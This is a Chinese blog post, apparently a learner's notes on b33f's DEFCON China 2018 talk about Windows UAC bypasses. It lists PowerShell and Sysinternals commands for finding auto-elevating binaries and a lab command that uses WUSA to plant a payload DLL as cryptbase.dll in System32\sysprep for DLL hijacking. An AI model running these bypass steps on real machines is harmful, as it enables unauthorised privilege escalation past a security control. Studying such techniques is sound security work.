DEFCON2018 CHINA(part：0x01)

DEFCON CHINA 行 已经结束两天了 总与有时间研究下大佬们分享的文章了。

这次要学习的是 Ruben Boonen(b33f)大佬分享的内容

大佬GitHub

这次b33f大佬的议题是:
UAC 0day ,all day!
用户账户控制，每天都是0day。

0x01: 一些基本概念

User Account Control

AppLocker

脚本都在这里找到

0x002: 用到的一些脚本的功能

脚本大部分是基于powershell的 我的环境是win7x64位下:

Get-TokenPrivs.ps1

Get-TokenPrivs -ProcID 3052

使用得到如上图所示，其作用是:

打开进程的句柄，并调用Advapi32 :: GetTokenInformation列出与进程相关联的特权。

这次使用的还有如下脚本 ，使用方法都类似，而且很多工具都有类似的功能 就不一个一个介绍了:

0x03：查找自动提权 Get-AutoElevate

有很多种方法:比如使用String.exe( Sysinternals Strings )

strings.exe  -s *.exe | findstr /i "autoElevate"

一些使用看这里

也可以使用 Sigcheck.exe 查看指定的 或者使用powershell内定函数

C:\Users\evil0x00\Desktop\0Day\0Day\DefCon-Tools>sigcheck64.exe -m c:\Windows\sy
stem32\taskmgr.exe

或者:

Get-Content -Path C:\Windows\System32\Taskmgr.exe | Select-String -Pattern "autoElevate"

同时大佬提供的也有脚本

Get-AutoElevate.ps1

 Get-AutoElevate -Path C:\Windows\System32\ -MaxDepth 1

查询结果如下:

0x04 绕过UAC创建文件

这个是由WUSA来绕过的。

正常情况下 在此目录下新建文件是不允许的，必须提升到管理员权限。如下图所示:

使用大佬提供的脚本 直接执行 如下:

=========================================[Lab1 - WUSA]

 - Filter: NAME NOT FOUND, High Integrity, Path end in ".dll"
 - Elevated-WUSA -Payload C:\DefCon-Tools\Yamabiko\yamabiko-x64.dll -DestinationPath C:\Windows\System32\sysprep\ -DestinationName cryptbase.dll

执行如下:

可以看到成功创建了dll 写入了文件

0x05

这次就先写到这 剩下的看下一篇文章